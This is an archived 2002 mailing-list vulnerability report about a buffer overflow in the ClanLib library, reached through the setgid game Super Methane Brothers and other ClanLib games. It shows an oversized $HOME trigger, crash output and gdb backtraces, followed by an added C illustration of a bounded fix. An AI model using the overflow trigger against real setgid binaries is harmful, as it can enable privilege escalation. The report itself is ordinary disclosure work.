Clanlib overflow / Super Methane Brothers overflow

From: KF (dotslashat_private)
Date: Mon Jan 14 2002 - 16:56:09 PST


    Charles stayed up all night and found a hole in Eterm, so I felt obligated to stay up all night and find something else wrong on my box too. In doing so I found an overflow in a game included with Mandrake 8.1 called Super Methane Brothers: set $HOME=<bof here>, then run /usr/games/methane. In turn that caused me to find an overflow in ClanLib. So thanks for staying up late last night, core!
    
    This was all tested against some rpms made from the Mandrake src with "rpm --rebuild":
    libclanlib0-0.4.4-28mdk
    libclanlib0-magick-0.4.4-28mdk
    clanlib-0.4.4-28mdk
    libclanlib0-gl-0.4.4-28mdk
    libclanlib0-png-0.4.4-28mdk
    libclanlib0-devel-0.4.4-28mdk
    libclanlib1-0.5.1-4mdk
    libclanlib0-mikmod-0.4.4-28mdk
    
    It looks like the buffer overflow in /usr/games/methane is a library overflow in ClanLib instead. I checked some other ClanLib-based games to prove this.
    
    [root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'`
    [root@linuxppc root]# /usr/games/methane
    Super Methane Brothers
    Licensed using the GNU General Public License Version 2
    http://www.methane.fsnet.co.uk
    ...
    This game requires ClanLib (v0.5.0) and Hermes (v1.3.3) 
    http://clanlib.org/hermes
    (High Scores written to /var/lib/games/methanescores)
    Segmentation fault
    
    [root@linuxppc root]# ls -al /usr/games/methane
    -rwxr-sr-x    1 root     games     1978056 Nov 13 06:36 /usr/games/methane*
    
    This was default on my Intel Mandrake 8.1 box. I overwrote edx and ecx with my own data. I don't do Intel, so I didn't try any further. I got the packages for ppc and it was no fun to play with, so I decided to look at some other ClanLib-based games to at least verify the library issue. I think the below link has info on the function causing the problem.
    
    http://dark.x.dtu.dk/~sphair/cvs/Libs/ClanLib-0.5/Documentation/Reference/html/CL_SetupDisplay.html#2325
    
    Here are some more examples of the clanlib overflow.
    
    StarWar-0.0.1d.tar.gz
    [root@linuxppc StarWar-0.0.1]# export HOME=`perl -e 'print "A" x 9000'`
    [root@linuxppc StarWar-0.0.1]# src/starwar
    Segmentation fault (core dumped)
    
    This is the same place methane cored on my intel box...
    #0  0x0fc81b78 in strcpy () from /lib/libc.so.6
    (gdb) bt
    #0  0x0fc81b78 in strcpy () from /lib/libc.so.6
    #1  0x0ff89554 in FileConfig::LocalConfigFile () from /usr/lib/libclanCore.so.0
    #2  0x0ff87014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
    #3  0x0ff83b28 in CL_SetupCore::init_display () from /usr/lib/libclanCore.so.0
    #4  0x1000d37c in InitDisplayApp::main ()
    #5  0x0ff85270 in main () from /usr/lib/libclanCore.so.0
    #6  0x0fc1eb90 in __libc_start_main () from /lib/libc.so.6
    
    kwirk-0.0.16.tar.gz
    [root@linuxppc Kwirk]# ./kwirk
    Segmentation fault (core dumped)
    (gdb)
    #0  0x0fd36b78 in strcpy () from /lib/libc.so.6
    #1  0x0fef0554 in FileConfig::LocalConfigFile () from /usr/lib/libclanCore.so.0
    #2  0x0feee014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
    #3  0x0feeab28 in CL_SetupCore::init_display () from /usr/lib/libclanCore.so.0
    #4  0x1001e8f4 in TKwirk::init_modules (this=0x10054104) at kwirk.cpp:24
    #5  0x0feec1fc in main () from /usr/lib/libclanCore.so.0
    #6  0x0fcd3b90 in __libc_start_main () from /lib/libc.so.6
    
    clankanoid-0.1.tgz
    [root@linuxppc clanka]# ./clankanoid
    Segmentation fault (core dumped)
    
    I think you get the idea. I would imagine about any game on http://www.clanlib.org/links.html would have this issue also. I'm sure a few ClanLib games are suid like the one that came with Mandrake 8.1 (methane).
    -KF
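    The backtraces above show strcpy() being called from FileConfig::LocalConfigFile with $HOME as the source, and the binary is setgid (-rwxr-sr-x), so the environment is attacker-controlled input. The following is an added illustration, not ClanLib's code: CONFIG_PATH_MAX, CONFIG_SUFFIX and the function names are assumptions, and it shows the bounded, fail-closed way to build the same path plus a check that flags inputs that would have overrun the fixed buffer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed names: the buffer size and config file name are a reconstruction
 * of the strcpy pattern in the backtrace, not ClanLib's actual values. */
#define CONFIG_PATH_MAX 256
#define CONFIG_SUFFIX   ".clanlib"

/* Mirrors the crash condition: returns 1 when copying home + "/" + suffix
 * into a CONFIG_PATH_MAX buffer with strcpy/strcat would write past its end. */
int would_overflow(const char *home) {
    return strlen(home) + 1 + strlen(CONFIG_SUFFIX) + 1 > CONFIG_PATH_MAX;
}

/* Hardened form: treat $HOME as untrusted (the binary is setgid), require
 * an absolute path, and refuse rather than truncate when it does not fit.
 * Returns 0 on success, -1 if the input is rejected. */
int local_config_file(const char *home, char *out, size_t outlen) {
    if (home == NULL || home[0] != '/' || outlen == 0)
        return -1;
    int n = snprintf(out, outlen, "%s/%s", home, CONFIG_SUFFIX);
    if (n < 0 || (size_t)n >= outlen) {   /* would not fit: fail closed */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Replays the report's constructed input (HOME = 9000 x "A") against the
 * hardened version: returns 1 if it is rejected, 0 otherwise. */
int long_home_is_rejected(void) {
    char home[9001], out[CONFIG_PATH_MAX];
    memset(home, 'A', 9000);
    home[9000] = '\0';
    return local_config_file(home, out, sizeof out) == -1 && would_overflow(home);
}

/* Sanity check on a normal HOME: returns 1 if the expected path is built. */
int normal_home_is_accepted(void) {
    char out[CONFIG_PATH_MAX];
    if (local_config_file("/home/kf", out, sizeof out) != 0)
        return 0;
    return strcmp(out, "/home/kf/" CONFIG_SUFFIX) == 0;
}

int main(void) {
    printf("long HOME rejected: %d\n", long_home_is_rejected());
    printf("normal HOME accepted: %d\n", normal_home_is_accepted());
    return 0;
}
```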
    



    This archive was generated by hypermail 2b30 : Tue Jan 15 2002 - 15:16:16 PST